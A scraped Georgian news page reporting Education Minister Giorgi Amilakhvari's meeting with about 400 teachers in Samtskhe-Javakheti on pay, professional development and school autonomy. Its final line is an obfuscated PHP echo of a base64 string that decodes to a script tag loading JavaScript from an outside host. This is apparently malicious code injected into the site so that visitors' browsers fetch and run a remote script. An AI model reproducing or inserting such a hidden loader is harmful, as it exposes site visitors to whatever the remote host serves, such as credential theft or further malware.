celsiusi
ავერსი საქკაბელი

განათლებისა და მეცნიერების მინისტრი გიორგი ამილახვარმა სამცხე-ჯავახეთის რეგიონის 400-მდე მასწავლებელთან შეხვედრა გამართა.

სამინისტროს ცნობით, შეხვედრაზე გიორგი ამილახვარმა ისაუბრა მასწავლებელთა მხარდაჭერის მიზნით განხორციელებულ და დაგეგმილ ინიციატივებზე.

მათ შორის, მინისტრმა პედაგოგებს ახალი სახელფასო პოლიტიკის, მასწავლებელთა პროფესიული განვითარების ხელშეწყობისა და სკოლის ავტონომიურობის გაძლიერების კუთხით გადასადგმელი ნაბიჯები გააცნო.

საუბარი შეეხო სხვადასხვა აქტუალურ საკითხს. კერძოდ, ეთნიკური უმცირესობების წარმომადგენელი პედაგოგების მხარდაჭერას, სკოლების დაფინანსებას, მასწავლებელთა საათობრივ დატვირთვას და სხვა. შეხვედრისას მასწავლებლებს შესაძლებლობა ჰქონდათ, მათთვის საინტერესო საკითხებთან დაკავშირებით შეკითხვები დაესვათ და უშუალოდ მინისტრისგან მიეღოთ დეტალური ინფორმაცია.

აღსანიშნავია, რომ გიორგი ამილახვარის ინიციატივით მასწავლებლებთან შეხვედრები ეტაპობრივად მთელი ქვეყნის მასშტაბით გაიმართება, რათა პედაგოგთა წინაშე არსებულ პრობლემებზე მოხდეს დროული რეაგირება და შესაბამისი გადაწყვეტილებების მიღების პროცესში მათი აქტიური ჩართულობის უზრუნველყოფა.

162
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");